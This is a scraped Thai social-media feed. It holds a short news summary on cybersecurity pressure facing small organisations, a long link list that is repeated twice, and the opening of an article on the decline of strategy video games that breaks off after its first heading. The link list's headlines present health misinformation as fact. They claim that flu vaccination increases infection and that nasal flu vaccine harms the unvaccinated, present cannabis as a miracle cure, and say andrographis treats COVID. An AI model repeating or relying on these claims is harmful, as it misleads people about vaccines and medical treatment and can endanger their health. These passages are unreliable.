    ข้อมูลจากข่าว
    - 71% ของผู้นำด้านไซเบอร์เชื่อว่าองค์กรขนาดเล็กกำลังถึงจุดวิกฤต
    - 35% ขององค์กรขนาดเล็กเชื่อว่าความสามารถในการป้องกันภัยไซเบอร์ของตนไม่เพียงพอ
    - ช่องว่างด้านทักษะไซเบอร์เพิ่มขึ้น 8% โดย 2 ใน 3 ขององค์กรขาดบุคลากรที่มีความสามารถ
    - องค์กรขนาดเล็กมักตกเป็นเป้าหมายของการโจมตีแบบ supply chain attack
    - การใช้ AI ในการโจมตีไซเบอร์ เช่น phishing และ ransomware-as-a-service กำลังเพิ่มขึ้น

    ความเสี่ยงและข้อควรระวัง
    องค์กรขนาดเล็ก มักเข้าใจผิดว่าภัยไซเบอร์มุ่งเป้าไปที่องค์กรขนาดใหญ่เท่านั้น แต่ในความเป็นจริง พวกเขาเป็นเป้าหมายที่ง่ายสำหรับแฮกเกอร์

    คำเตือนที่ควรพิจารณา
    - องค์กรขนาดเล็กมักไม่มีทีมรักษาความปลอดภัยเฉพาะทาง ทำให้การตอบสนองต่อภัยคุกคามล่าช้า
    - การขาดการฝึกอบรมด้านไซเบอร์ทำให้พนักงานมีความเสี่ยงต่อ phishing และ social engineering
    - กฎระเบียบด้านไซเบอร์ เช่น NIS2 และ GDPR กำลังเพิ่มภาระให้กับองค์กรขนาดเล็ก
    - การใช้ AI ในการโจมตีไซเบอร์ทำให้ภัยคุกคามมีความซับซ้อนและยากต่อการตรวจจับมากขึ้น

    องค์กรขนาดเล็ก สามารถใช้บริการรักษาความปลอดภัยแบบ managed security services เพื่อช่วย ลดภาระของทีม IT และเพิ่มความสามารถในการป้องกันภัยไซเบอร์

    https://www.csoonline.com/article/4003892/smaller-organizations-nearing-cybersecurity-breaking-point.html
    🔐 องค์กรขนาดเล็กกำลังเผชิญวิกฤตความปลอดภัยไซเบอร์ รายงานล่าสุดจาก World Economic Forum (WEF) ระบุว่า 71% ของผู้นำด้านไซเบอร์เชื่อว่าองค์กรขนาดเล็กกำลังถึงจุดวิกฤต เนื่องจาก งบประมาณที่จำกัด ทีม IT ที่ทำงานหนักเกินไป และภัยคุกคามที่ซับซ้อนขึ้น องค์กรขนาดเล็ก ขาดทรัพยากรและบุคลากรที่มีความเชี่ยวชาญด้านไซเบอร์ ทำให้ ความสามารถในการป้องกันภัยคุกคามลดลงอย่างมาก ✅ ข้อมูลจากข่าว - 71% ของผู้นำด้านไซเบอร์เชื่อว่าองค์กรขนาดเล็กกำลังถึงจุดวิกฤต - 35% ขององค์กรขนาดเล็กเชื่อว่าความสามารถในการป้องกันภัยไซเบอร์ของตนไม่เพียงพอ - ช่องว่างด้านทักษะไซเบอร์เพิ่มขึ้น 8% โดย 2 ใน 3 ขององค์กรขาดบุคลากรที่มีความสามารถ - องค์กรขนาดเล็กมักตกเป็นเป้าหมายของการโจมตีแบบ supply chain attack - การใช้ AI ในการโจมตีไซเบอร์ เช่น phishing และ ransomware-as-a-service กำลังเพิ่มขึ้น ⚠️ ความเสี่ยงและข้อควรระวัง องค์กรขนาดเล็ก มักเข้าใจผิดว่าภัยไซเบอร์มุ่งเป้าไปที่องค์กรขนาดใหญ่เท่านั้น แต่ในความเป็นจริง พวกเขาเป็นเป้าหมายที่ง่ายสำหรับแฮกเกอร์ ‼️ คำเตือนที่ควรพิจารณา - องค์กรขนาดเล็กมักไม่มีทีมรักษาความปลอดภัยเฉพาะทาง ทำให้การตอบสนองต่อภัยคุกคามล่าช้า - การขาดการฝึกอบรมด้านไซเบอร์ทำให้พนักงานมีความเสี่ยงต่อ phishing และ social engineering - กฎระเบียบด้านไซเบอร์ เช่น NIS2 และ GDPR กำลังเพิ่มภาระให้กับองค์กรขนาดเล็ก - การใช้ AI ในการโจมตีไซเบอร์ทำให้ภัยคุกคามมีความซับซ้อนและยากต่อการตรวจจับมากขึ้น องค์กรขนาดเล็ก สามารถใช้บริการรักษาความปลอดภัยแบบ managed security services เพื่อช่วย ลดภาระของทีม IT และเพิ่มความสามารถในการป้องกันภัยไซเบอร์ https://www.csoonline.com/article/4003892/smaller-organizations-nearing-cybersecurity-breaking-point.html
    WWW.CSOONLINE.COM
    Smaller organizations nearing cybersecurity breaking point
    Strained budgets, overstretched teams, and a rise in sophisticated threats is leading to plummeting security confidence among SMEs as cybercriminals increasingly target them in supply chain attacks.
    0 ความคิดเห็น 0 การแบ่งปัน 280 มุมมอง 0 รีวิว
  • 2/4
    วัคซีนไข้หวัดใหญ่จำเป็นจริงหรือ?
    ยาต้านไข้หวัดใหญ่เกือบทั้งหมดมีผลเพียงเล็กน้อยหรือไม่มีเลย
    https://www.facebook.com/share/p/12MUpcXzhix/
    วัคซีนไข้หวัดใหญ่ ฉีดแล้วติดมากขึ้น
    https://www.facebook.com/share/p/1EtbSXvysA/
    การศึกษาในสหรัฐเองพบว่าการฉีดวัคซีนไข้หวัดใหญ่กลับติดมากขึ้น
    https://www.facebook.com/share/p/1Ev49KVPiF/
    วัคซีนไข้หวัดใหญ่ รวมทั้งยารักษา มีประสิทธิภาพจำกัด
    https://www.facebook.com/share/p/19MnnaM6Xy/
    ข้อสงสัยวัคซีนไข้หวัดใหญ่และยาต้าน
    https://www.facebook.com/share/p/1AVAQJRB3W/
    การทดลองของ บริษัทยา พบว่ายาต้านไวรัส ไข้หวัดใหญ่ baloxavir อาจช่วยลดการแพร่เชื้อไข้หวัดใหญ่ในครัวเรือนได้ แต่ไม่ช่วยเรื่องอาการ
    https://www.facebook.com/share/p/15gVerMQdu/
    วัคซีน ไข้หวัดใหญ่ชนิดพ่น ข้อควรระวัง ไวรัส วัคซีน ปลดปล่อยออกไปได้ สู่คนอื่นโดยเฉพาะ คนเปราะบาง
    https://www.facebook.com/share/p/15vdADs7EX/
    โคลอสตรุ้ม หัวน้ำนม นมแม่ ประโยชน์มหาศาลเช่น ป้องกันไข้หวัดใหญ่
    https://www.facebook.com/share/p/14dkhKZpMT/
    กระบวนการหลักฐานทางวิทยาศาสตร์เป็นสิ่งจำเป็นอย่างยิ่งที่นำมาใช้ ไม่ใช่ใช้เพราะเป็นเพียงแต่ความเชื่อ
    https://www.facebook.com/share/p/16FphP1NoG/
    การบูลลี่คือสิ่งที่ไม่ควรทำกันโดยเฉพาะผู้ที่บอกคนอื่นว่าตนเป็นแพทย์
    https://www.facebook.com/share/p/1HqVz45t6n/
    https://www.facebook.com/share/p/16CJH6XQqL/
    วัคซีนไข้หวัดใหญ่ชนิดฉีดพ่น อันตรายแพร่ถึงคนที่ไม่ได้ฉีด
    https://www.facebook.com/share/p/1CCzQtyWtr/
    หมอดื้อยกข้อมูลทางวิทยาศาสตร์ตอบข้อกล่าวหา
    https://www.facebook.com/share/p/1BrtYfLuA3/
    ประสิทธิภาพของวัคซีนไข้หวัดใหญ่ และยาต้านไวรัสเมื่อมีอาการแล้ว
    https://www.facebook.com/share/p/14tUYkZRR6A/
    หวัดใหญ่ทำไมติดบาน วัคซีนจะฉีดไหม
    https://www.facebook.com/share/p/19wichtfbz/
    กัญชา,ฟ้าทะลายโจร เมื่อการสาธารณสุขถูกครอบงำ แต่ความจริงก็ไม่อาจปกปิด

    กัญชา
    “หมอธีระวัฒน์” ชี้เรื่องกัญชา สะท้อนความนิ่งเฉย เสื่อมน้ำใจและความเมตตา ลั่นถอยไม่ได้แล้ว
    https://mgronline.com/qol/detail/9670000039410#google_vignette
    “กัญชา-บุหรี่และแอลกอฮอล์” ควรนำสิ่งใดกลับสู่ยาเสพติด?
    https://mgronline.com/daily/detail/9670000042065
    กัญชา กัญชง ลดการอักเสบ
    https://youtu.be/-j9HYHTUugU?si=E3RbUpfpJRmspEXX
    “หมอธีระวัฒน์” เผยใช้สารเดี่ยว CBD รักษาลมชักให้ทำให้โรคดื้อยา ทำไมไม่ใช้ตำรับบ้านๆ ที่พิสูจน์แล้วว่าได้ผล กลับชง “กัญชา” เป็นยาเสพติด
    https://mgronline.com/qol/detail/9670000047356
    หมอธวัชชัย” ชี้ดึงกัญชากลับสู่ยาเสพติดวุ่นวายแน่ ยันก่อนปลดล็อกผ่านการศึกษาข้อมูลมากแล้ว เริ่มจากยุค “หมอปิยะสกล” ไม่ใช่การเมือง
    https://mgronline.com/qol/detail/9670000049253
    “ปานเทพ” แฉ 5 ประเด็นบิดเบือนข้อมูลกัญชา ดึงกลับเป็นยาเสพติด ไม่นำไปสู่การแก้ปัญหา
    https://mgronline.com/politics/detail/9670000050912
    เผยงานวิจัย ยากัญชาไทยรักษาเด็กโรคลมชักดื้อยา ได้ผลดีกว่ายาฝรั่ง จะช่วยประหยัดเงินได้สูงถึง 7.3 หมื่นล้านบาท
    https://mgronline.com/qol/detail/9670000055043
    วันที่ 5 ก.ค.2567 รายการสภากาแฟ ช่อง News1 สัมภาษณ์ ม.ล.รุ่งคุณ กิติยากร และคุณประสิทธิชัย หนูนวล หัวข้อ ฟังความเป็นจริงของสถานการณ์ กัญชา และ ระบบทรราชทางการแพทย์ (Medical Tyranny)
    https://www.youtube.com/live/kBdl3ud3RDE
    “อ.ปานเทพ”ค้านนำช่อดอกกัญชากัญชงเป็นยาเสพติด บังคับใช้ กม.ไม่ได้ ปฏิบัติไม่ได้ กระทบผู้ป่วย เกษตรกร แพทย์แผนไทย
    https://mgronline.com/politics/detail/9670000057536?fbclid=IwZXh0bgNhZW0CMTEAAR2n0WMI0yEvvFrhmDEvvIYDVFiFmi74wgnBcb-NGMeeRL3peNb34PE72t0_aem_RLFy41fdTyNwRVhW-BqJDA
    “อ.ปานเทพ” ยื่นหนังสือ 12 ก.ค.2567
    จี้ รมว.สธ.ทบทวนประกาศกัญชาเป็นยาเสพติด พร้อมแถลงแนวทางใหม่แก้ปัญหา
    https://mgronline.com/qol/detail/9670000059092
    มหัศจรรย์กัญชา เด็กหนุ่มเลือดออกในสมอง หมอบอกจะเสียชีวิต แต่กลับคืนมาใช้ชีวิตตามปกติได้
    https://mgronline.com/qol/detail/9670000059188
    อ.ปานเทพ ยื่นหนังสือให้รัฐมนตรีว่าการกระทรวงสาธารณสุข เหตุที่ต้องทบทวนมติ ช่อดอกกัญชา ช่อดอกกันชงยาเสพติด 12 ก.ค.2567 สำนักงานปลัดกระทรวงสาธารณสุข
    https://youtu.be/F9Llyj2B5PE?si=uFlm9ovYpEfhH28-
    วันที่ 8 ก.ค.2567 ประชาชนและเครือข่ายเขียนอนาคตกัญชาไทย ร่วมชุมนุมที่หน้าทำเนียบรัฐบาล ที่สะพานชมัยมรุเชฐ เพื่อทวงสิทธิทางกัญชาเพื่อประชาชน
    https://www.amarintv.com/news/detail/224142
    https://ch3plus.com/news/social/morning/407582
    รวมภาพ https://m.facebook.com/story.php?story_fbid=pfbid0SsB5c3wJo44TqTkXmo5TqC9iEEuNat8Wt8gTNuvj8RiKfikXAZcLZa36vYfdfKUkl&id=100002610663072
    คลิปอาจารย์เดชา ศิริภัทร และม.ล.รุ่งคุณ กิติยากร https://m.facebook.com/story.php?story_fbid=pfbid0hC9uN9iSm2444FgBUbyBcGnNc91Ef4txT4YcnTSnzZiWCv16o98eAD9odrT6Zfcxl&id=100007418351447
    “อ.ปานเทพ” เปิดหลักฐานกลุ่มผลประโยชน์ ล็อกสเปกกัญชาเป็นยาเสพติด เอื้อทุนใหญ่- กีดกันแพทย์แผนไทย
    https://mgronline.com/politics/detail/9670000061226
    วันที่ 23 ก.ค.2567 แหล่งข่าวจากคณะรัฐมนตรี เรื่องกัญชา สรุป คณะรัฐมนตรีวันนี้ นายกรัฐมนตรีให้นำเรื่องกัญชา กัญชงตราเป็นพระราชบัญญัติ ทุกพรรค ทุกกลุ่มสามารถเสนอร่างของตัวเองต่อที่ประชุมสภาผู้แทนราษฎรเพื่อพิจารณาต่อไป
    แปลว่าไม่ใช่นำกัญชา กัญชงเข้าสู่บัญชียาเสพติดตามประมวลกฎหมายยาเสพติด แต่ให้มีกฎหมายเฉพาะสำหรับใช้ประโยชน์และควบคุมกัญชา กัญชง
    https://www.facebook.com/100044511276276/posts/1017634479730252/?
    https://mgronline.com/qol/detail/9670000062202
    “หมอธีระวัฒน์” เผยผลวิจัยใช้กัญชาคลายเครียดแต่พองาม ช่วยลดสมองเสื่อม
    https://mgronline.com/qol/detail/9670000083401
    ฟ้าทะลายโจร
    แนวทางเวชปฏิบัติการวินิจฉัย ดูแลรักษาและป้องกันการติดเชื้อในโรงพยาบาล กรณีโรคติดเชื้อไวรัสโคโรนา 2019 (COVID-19) สําหรับแพทย์และบุคลากรสาธารณสุข ฉบับปรับปรุง วันที่ 5 มิถุนายน 2567
    ได้ถอดฟ้าทะลายโจรออกจากการรักษาแล้ว
    https://eid.dms.go.th/Content/Select_Eid_Landding_page?contentId=182&bannerId=1
    คำถามกรณีการตัดฟ้าทะลายโจรออกจากเวชปฏิบัติการรักษาโควิด-19 ในโรงพยาบาล เพื่อผลประโยชน์ของใครกันแน่ ?/ ปานเทพ พัวพงษ์พันธ์
    https://www.facebook.com/100044511276276/posts/990160812477619/?
    “ปานเทพ” ถาม ตัด “ฟ้าทะลายโจร” ออกจากแนวทางรักษาโควิด เอื้อประโยชน์ใครหรือไม่
    https://mgronline.com/qol/detail/9670000048616
    “หมอธีระวัฒน์” ชี้ผลศึกษา “ฟ้าทะลายโจร” เป็นที่ตื่นเต้นทั่วโลก รักษาโควิด-โรคไวรัสทางระบบหายใจได้ผล
    https://mgronline.com/qol/detail/9670000059905
    https://youtu.be/4N7GL1BbcH4?si=1aov92cn7xEXWSuV
    ยาไทยฟ้าทะลายโจร ภูมิปัญญา..สู้ยานอก โดย หมอดื้อ
    https://www.thairath.co.th/news/local/2804216?
    วันที่ 16 กรกฎาคม 67 ที่กระทรวงสาธารณสุข(สธ.) อ.ปานเทพ พัวพงษ์พันธ์ คณบดีวิทยาลัยการแพทย์แผนตะวันออก มหาวิทยาลัยรังสิต ศ.นพ.ธีระวัฒน์ เหมะจุฑา ผู้เชี่ยวชาญทางอายุรกรรม และระบบประสาท ในฐานะที่ปรึกษาวิทยาลัยการแพทย์แผนตะวันออก และ น.ส.รสนา โตสิตระกูล อดีตสมาชิกวุฒิสภา เข้ายื่นหนังสือถึงนายสมศักดิ์ เทพสุทิน รัฐมนตรีว่าการกระทรวงสาธารณสุข(สธ.) เพื่อยื่นข้อเสนอกรณีถอด “ฟ้าทะลายโจร” ออกจากแนวทางรักษา ทั้งที่มีประสิทธิภาพ พร้อมนำข้อมูลตีแผ่ต่อสาธารณะ ถึงสาเหตุถอดสมุนไพรไทยดังกล่าว ทั้งที่ช่วงโควิดเป็นสมุนไพรรักษาที่ดี ช่วยชีวิตผู้คนจำนวนมาก
    https://www.hfocus.org/content/2024/07/31098?
    https://www.hfocus.org/content/2024/07/31097
    https://youtu.be/rjUdN1cFr7I?si=p8Pl1398CpXUjpJQ
    กรมการแพทย์ยอมใช้ฟ้าทะลายโจรกลับมารักษาโควิดได้แล้ว รวมทั้งแพทย์จ่ายได้และรักษาไม่คิดค่าใช้จ่าย 23 ก.ค.2567
    https://www.hfocus.org/content/2024/07/31153?
    “หมอธีระวัฒน์” ทวง รมว.สธ.แจงเบื้องหลังถอดฟ้าทะลายโจรพ้นเวชปฏิบัติรักษาโควิด ชี้คนไทยเสียประโยชน์ต้องมีผู้รับผิดชอบ
    https://mgronline.com/qol/detail/9670000067814
    “ปานเทพ” ถาม “สมศักดิ์” ทวงคืนฟ้าทะลายโจรให้ผู้ป่วยกี่โมง
    https://mgronline.com/qol/detail/9670000067977
    “อ.ปานเทพ” เผยข่าวดี! กรมการแพทย์ ยอมคืนฟ้าทะลายโจรให้กับผู้ป่วยโควิด-19 แล้ว
    https://www.hfocus.org/content/2024/08/31270
    https://mgronline.com/qol/detail/9670000070325
    หัวข้อ : 3 หมอ กอบกู้"โลก" รักษา"โรค" ด้วยสมุนไพร
    ระดมพลังบรรยายโดย 1. นพ. อรรถพล สุคนธาภิรมย์ ณ พัทลุง 2.พญ. สุภาพร มีลาภ และ 3. นพ. พงษ์ศักดิ์ ตั้งคณา
    ณ หอศิลปวัฒนธรรมแห่งกรุงเทพฯ 3 พฤษภาคม 2567 คลิกชม
    https://www.facebook.com/share/v/K8yDn5N29sbiaqVm/?mibextid=oFDknk
    2/4 ✅วัคซีนไข้หวัดใหญ่จำเป็นจริงหรือ? ✍️ยาต้านไข้หวัดใหญ่เกือบทั้งหมดมีผลเพียงเล็กน้อยหรือไม่มีเลย https://www.facebook.com/share/p/12MUpcXzhix/ ✍️วัคซีนไข้หวัดใหญ่ ฉีดแล้วติดมากขึ้น https://www.facebook.com/share/p/1EtbSXvysA/ ✍️การศึกษาในสหรัฐเองพบว่าการฉีดวัคซีนไข้หวัดใหญ่กลับติดมากขึ้น https://www.facebook.com/share/p/1Ev49KVPiF/ ✍️วัคซีนไข้หวัดใหญ่ รวมทั้งยารักษา มีประสิทธิภาพจำกัด https://www.facebook.com/share/p/19MnnaM6Xy/ ✍️ข้อสงสัยวัคซีนไข้หวัดใหญ่และยาต้าน https://www.facebook.com/share/p/1AVAQJRB3W/ ✍️การทดลองของ บริษัทยา พบว่ายาต้านไวรัส ไข้หวัดใหญ่ baloxavir อาจช่วยลดการแพร่เชื้อไข้หวัดใหญ่ในครัวเรือนได้ แต่ไม่ช่วยเรื่องอาการ https://www.facebook.com/share/p/15gVerMQdu/ ✍️วัคซีน ไข้หวัดใหญ่ชนิดพ่น ข้อควรระวัง ไวรัส วัคซีน ปลดปล่อยออกไปได้ สู่คนอื่นโดยเฉพาะ คนเปราะบาง https://www.facebook.com/share/p/15vdADs7EX/ ✍️โคลอสตรุ้ม หัวน้ำนม นมแม่ ประโยชน์มหาศาลเช่น ป้องกันไข้หวัดใหญ่ https://www.facebook.com/share/p/14dkhKZpMT/ ✍️กระบวนการหลักฐานทางวิทยาศาสตร์เป็นสิ่งจำเป็นอย่างยิ่งที่นำมาใช้ ไม่ใช่ใช้เพราะเป็นเพียงแต่ความเชื่อ https://www.facebook.com/share/p/16FphP1NoG/ ✍️การบูลลี่คือสิ่งที่ไม่ควรทำกันโดยเฉพาะผู้ที่บอกคนอื่นว่าตนเป็นแพทย์ https://www.facebook.com/share/p/1HqVz45t6n/ https://www.facebook.com/share/p/16CJH6XQqL/ ✍️วัคซีนไข้หวัดใหญ่ชนิดฉีดพ่น อันตรายแพร่ถึงคนที่ไม่ได้ฉีด https://www.facebook.com/share/p/1CCzQtyWtr/ ✍️หมอดื้อยกข้อมูลทางวิทยาศาสตร์ตอบข้อกล่าวหา https://www.facebook.com/share/p/1BrtYfLuA3/ ✍️ประสิทธิภาพของวัคซีนไข้หวัดใหญ่ และยาต้านไวรัสเมื่อมีอาการแล้ว https://www.facebook.com/share/p/14tUYkZRR6A/ ✍️หวัดใหญ่ทำไมติดบาน วัคซีนจะฉีดไหม https://www.facebook.com/share/p/19wichtfbz/ กัญชา,ฟ้าทะลายโจร เมื่อการสาธารณสุขถูกครอบงำ แต่ความจริงก็ไม่อาจปกปิด 🌿กัญชา ✍️“หมอธีระวัฒน์” ชี้เรื่องกัญชา สะท้อนความนิ่งเฉย เสื่อมน้ำใจและความเมตตา ลั่นถอยไม่ได้แล้ว https://mgronline.com/qol/detail/9670000039410#google_vignette ✍️“กัญชา-บุหรี่และแอลกอฮอล์” ควรนำสิ่งใดกลับสู่ยาเสพติด? https://mgronline.com/daily/detail/9670000042065 ✍️กัญชา กัญชง ลดการอักเสบ https://youtu.be/-j9HYHTUugU?si=E3RbUpfpJRmspEXX ✍️“หมอธีระวัฒน์” เผยใช้สารเดี่ยว CBD รักษาลมชักให้ทำให้โรคดื้อยา ทำไมไม่ใช้ตำรับบ้านๆ ที่พิสูจน์แล้วว่าได้ผล กลับชง “กัญชา” เป็นยาเสพติด https://mgronline.com/qol/detail/9670000047356 ✍️หมอธวัชชัย” ชี้ดึงกัญชากลับสู่ยาเสพติดวุ่นวายแน่ ยันก่อนปลดล็อกผ่านการศึกษาข้อมูลมากแล้ว เริ่มจากยุค “หมอปิยะสกล” ไม่ใช่การเมือง https://mgronline.com/qol/detail/9670000049253 ✍️“ปานเทพ” แฉ 5 ประเด็นบิดเบือนข้อมูลกัญชา ดึงกลับเป็นยาเสพติด ไม่นำไปสู่การแก้ปัญหา https://mgronline.com/politics/detail/9670000050912 ✍️เผยงานวิจัย ยากัญชาไทยรักษาเด็กโรคลมชักดื้อยา ได้ผลดีกว่ายาฝรั่ง จะช่วยประหยัดเงินได้สูงถึง 7.3 หมื่นล้านบาท https://mgronline.com/qol/detail/9670000055043 ✍️วันที่ 5 ก.ค.2567 รายการสภากาแฟ ช่อง News1 สัมภาษณ์ ม.ล.รุ่งคุณ กิติยากร และคุณประสิทธิชัย หนูนวล หัวข้อ ฟังความเป็นจริงของสถานการณ์ กัญชา และ ระบบทรราชทางการแพทย์ (Medical Tyranny) https://www.youtube.com/live/kBdl3ud3RDE ✍️“อ.ปานเทพ”ค้านนำช่อดอกกัญชากัญชงเป็นยาเสพติด บังคับใช้ กม.ไม่ได้ ปฏิบัติไม่ได้ กระทบผู้ป่วย เกษตรกร แพทย์แผนไทย https://mgronline.com/politics/detail/9670000057536?fbclid=IwZXh0bgNhZW0CMTEAAR2n0WMI0yEvvFrhmDEvvIYDVFiFmi74wgnBcb-NGMeeRL3peNb34PE72t0_aem_RLFy41fdTyNwRVhW-BqJDA ✍️“อ.ปานเทพ” ยื่นหนังสือ 12 ก.ค.2567 จี้ รมว.สธ.ทบทวนประกาศกัญชาเป็นยาเสพติด พร้อมแถลงแนวทางใหม่แก้ปัญหา https://mgronline.com/qol/detail/9670000059092 ✍️มหัศจรรย์กัญชา เด็กหนุ่มเลือดออกในสมอง หมอบอกจะเสียชีวิต แต่กลับคืนมาใช้ชีวิตตามปกติได้ https://mgronline.com/qol/detail/9670000059188 ✍️ อ.ปานเทพ ยื่นหนังสือให้รัฐมนตรีว่าการกระทรวงสาธารณสุข เหตุที่ต้องทบทวนมติ ช่อดอกกัญชา ช่อดอกกันชงยาเสพติด 12 ก.ค.2567 สำนักงานปลัดกระทรวงสาธารณสุข https://youtu.be/F9Llyj2B5PE?si=uFlm9ovYpEfhH28- ✍️วันที่ 8 ก.ค.2567 ประชาชนและเครือข่ายเขียนอนาคตกัญชาไทย ร่วมชุมนุมที่หน้าทำเนียบรัฐบาล ที่สะพานชมัยมรุเชฐ เพื่อทวงสิทธิทางกัญชาเพื่อประชาชน https://www.amarintv.com/news/detail/224142 https://ch3plus.com/news/social/morning/407582 รวมภาพ https://m.facebook.com/story.php?story_fbid=pfbid0SsB5c3wJo44TqTkXmo5TqC9iEEuNat8Wt8gTNuvj8RiKfikXAZcLZa36vYfdfKUkl&id=100002610663072 คลิปอาจารย์เดชา ศิริภัทร และม.ล.รุ่งคุณ กิติยากร https://m.facebook.com/story.php?story_fbid=pfbid0hC9uN9iSm2444FgBUbyBcGnNc91Ef4txT4YcnTSnzZiWCv16o98eAD9odrT6Zfcxl&id=100007418351447 ✍️“อ.ปานเทพ” เปิดหลักฐานกลุ่มผลประโยชน์ ล็อกสเปกกัญชาเป็นยาเสพติด เอื้อทุนใหญ่- กีดกันแพทย์แผนไทย https://mgronline.com/politics/detail/9670000061226 ✍️วันที่ 23 ก.ค.2567 แหล่งข่าวจากคณะรัฐมนตรี เรื่องกัญชา สรุป คณะรัฐมนตรีวันนี้ นายกรัฐมนตรีให้นำเรื่องกัญชา กัญชงตราเป็นพระราชบัญญัติ ทุกพรรค ทุกกลุ่มสามารถเสนอร่างของตัวเองต่อที่ประชุมสภาผู้แทนราษฎรเพื่อพิจารณาต่อไป แปลว่าไม่ใช่นำกัญชา กัญชงเข้าสู่บัญชียาเสพติดตามประมวลกฎหมายยาเสพติด แต่ให้มีกฎหมายเฉพาะสำหรับใช้ประโยชน์และควบคุมกัญชา กัญชง https://www.facebook.com/100044511276276/posts/1017634479730252/? https://mgronline.com/qol/detail/9670000062202 ✍️“หมอธีระวัฒน์” เผยผลวิจัยใช้กัญชาคลายเครียดแต่พองาม ช่วยลดสมองเสื่อม https://mgronline.com/qol/detail/9670000083401 🌿ฟ้าทะลายโจร ✍️แนวทางเวชปฏิบัติการวินิจฉัย ดูแลรักษาและป้องกันการติดเชื้อในโรงพยาบาล กรณีโรคติดเชื้อไวรัสโคโรนา 2019 (COVID-19) สําหรับแพทย์และบุคลากรสาธารณสุข ฉบับปรับปรุง วันที่ 5 มิถุนายน 2567 ได้ถอดฟ้าทะลายโจรออกจากการรักษาแล้ว https://eid.dms.go.th/Content/Select_Eid_Landding_page?contentId=182&bannerId=1 ✍️คำถามกรณีการตัดฟ้าทะลายโจรออกจากเวชปฏิบัติการรักษาโควิด-19 ในโรงพยาบาล เพื่อผลประโยชน์ของใครกันแน่ ?/ ปานเทพ พัวพงษ์พันธ์ https://www.facebook.com/100044511276276/posts/990160812477619/? ✍️“ปานเทพ” ถาม ตัด “ฟ้าทะลายโจร” ออกจากแนวทางรักษาโควิด เอื้อประโยชน์ใครหรือไม่ https://mgronline.com/qol/detail/9670000048616 ✍️“หมอธีระวัฒน์” ชี้ผลศึกษา “ฟ้าทะลายโจร” เป็นที่ตื่นเต้นทั่วโลก รักษาโควิด-โรคไวรัสทางระบบหายใจได้ผล https://mgronline.com/qol/detail/9670000059905 https://youtu.be/4N7GL1BbcH4?si=1aov92cn7xEXWSuV ✍️ยาไทยฟ้าทะลายโจร ภูมิปัญญา..สู้ยานอก โดย หมอดื้อ https://www.thairath.co.th/news/local/2804216? ✍️วันที่ 16 กรกฎาคม 67 ที่กระทรวงสาธารณสุข(สธ.) อ.ปานเทพ พัวพงษ์พันธ์ คณบดีวิทยาลัยการแพทย์แผนตะวันออก มหาวิทยาลัยรังสิต ศ.นพ.ธีระวัฒน์ เหมะจุฑา ผู้เชี่ยวชาญทางอายุรกรรม และระบบประสาท ในฐานะที่ปรึกษาวิทยาลัยการแพทย์แผนตะวันออก และ น.ส.รสนา โตสิตระกูล อดีตสมาชิกวุฒิสภา เข้ายื่นหนังสือถึงนายสมศักดิ์ เทพสุทิน รัฐมนตรีว่าการกระทรวงสาธารณสุข(สธ.) เพื่อยื่นข้อเสนอกรณีถอด “ฟ้าทะลายโจร” ออกจากแนวทางรักษา ทั้งที่มีประสิทธิภาพ พร้อมนำข้อมูลตีแผ่ต่อสาธารณะ ถึงสาเหตุถอดสมุนไพรไทยดังกล่าว ทั้งที่ช่วงโควิดเป็นสมุนไพรรักษาที่ดี ช่วยชีวิตผู้คนจำนวนมาก https://www.hfocus.org/content/2024/07/31098? https://www.hfocus.org/content/2024/07/31097 https://youtu.be/rjUdN1cFr7I?si=p8Pl1398CpXUjpJQ ✍️กรมการแพทย์ยอมใช้ฟ้าทะลายโจรกลับมารักษาโควิดได้แล้ว รวมทั้งแพทย์จ่ายได้และรักษาไม่คิดค่าใช้จ่าย 23 ก.ค.2567 https://www.hfocus.org/content/2024/07/31153? ✍️“หมอธีระวัฒน์” ทวง รมว.สธ.แจงเบื้องหลังถอดฟ้าทะลายโจรพ้นเวชปฏิบัติรักษาโควิด ชี้คนไทยเสียประโยชน์ต้องมีผู้รับผิดชอบ https://mgronline.com/qol/detail/9670000067814 ✍️“ปานเทพ” ถาม “สมศักดิ์” ทวงคืนฟ้าทะลายโจรให้ผู้ป่วยกี่โมง https://mgronline.com/qol/detail/9670000067977 ✍️“อ.ปานเทพ” เผยข่าวดี! กรมการแพทย์ ยอมคืนฟ้าทะลายโจรให้กับผู้ป่วยโควิด-19 แล้ว https://www.hfocus.org/content/2024/08/31270 https://mgronline.com/qol/detail/9670000070325 ✍️หัวข้อ : 3 หมอ กอบกู้"โลก" รักษา"โรค" ด้วยสมุนไพร ระดมพลังบรรยายโดย 1. นพ. อรรถพล สุคนธาภิรมย์ ณ พัทลุง 2.พญ. สุภาพร มีลาภ และ 3. นพ. พงษ์ศักดิ์ ตั้งคณา ณ หอศิลปวัฒนธรรมแห่งกรุงเทพฯ 3 พฤษภาคม 2567 👇คลิกชม👇 https://www.facebook.com/share/v/K8yDn5N29sbiaqVm/?mibextid=oFDknk
    0 ความคิดเห็น 0 การแบ่งปัน 770 มุมมอง 0 รีวิว
  • การเสื่อมถอยของเกมแนววางแผน (Strategy): สะท้อนภาพความเปลี่ยนแปลงของอุตสาหกรรมเกมและพฤติกรรมผู้เล่น

    เกมประเภทวางแผนหรือ Strategy เคยยืนอยู่แถวหน้าในโลกของวิดีโอเกม โดยเฉพาะในช่วงยุค 90 ถึงต้นยุค 2000 ซึ่งเต็มไปด้วยเกมระดับตำนานอย่าง Age of Empires, StarCraft, Command & Conquer, และ Civilization ที่ไม่เพียงแต่มอบประสบการณ์ความสนุกเร้าใจ แต่ยังฝึกฝนทักษะสำคัญ เช่น การคิดวิเคราะห์ การตัดสินใจเชิงกลยุทธ์ และการบริหารจัดการทรัพยากร

    อย่างไรก็ตาม ท่ามกลางความก้าวหน้าทางเทคโนโลยีและการเปลี่ยนแปลงของพฤติกรรมผู้เล่นในยุคดิจิทัล ความนิยมของเกมแนว Strategy กลับลดลงอย่างต่อเนื่อง ทำให้คำถามเกิดขึ้นว่า "เหตุใดเกมแนวที่เคยรุ่งโรจน์จึงเริ่มถูกลืม?" บทความนี้จะพาไปสำรวจต้นเหตุของการเปลี่ยนแปลงนี้ พร้อมทั้งวิเคราะห์ผลกระทบที่อาจเกิดขึ้นต่อทักษะของผู้เล่น และแนวทางในการฟื้นฟูเกมแนว Strategy ให้กลับมามีบทบาทอีกครั้ง

    สาเหตุหลักที่ทำให้เกมแนว Strategy เสื่อมความนิยม
    1️⃣ การเปลี่ยนผ่านของเทคโนโลยีและแพลตฟอร์มการเล่น
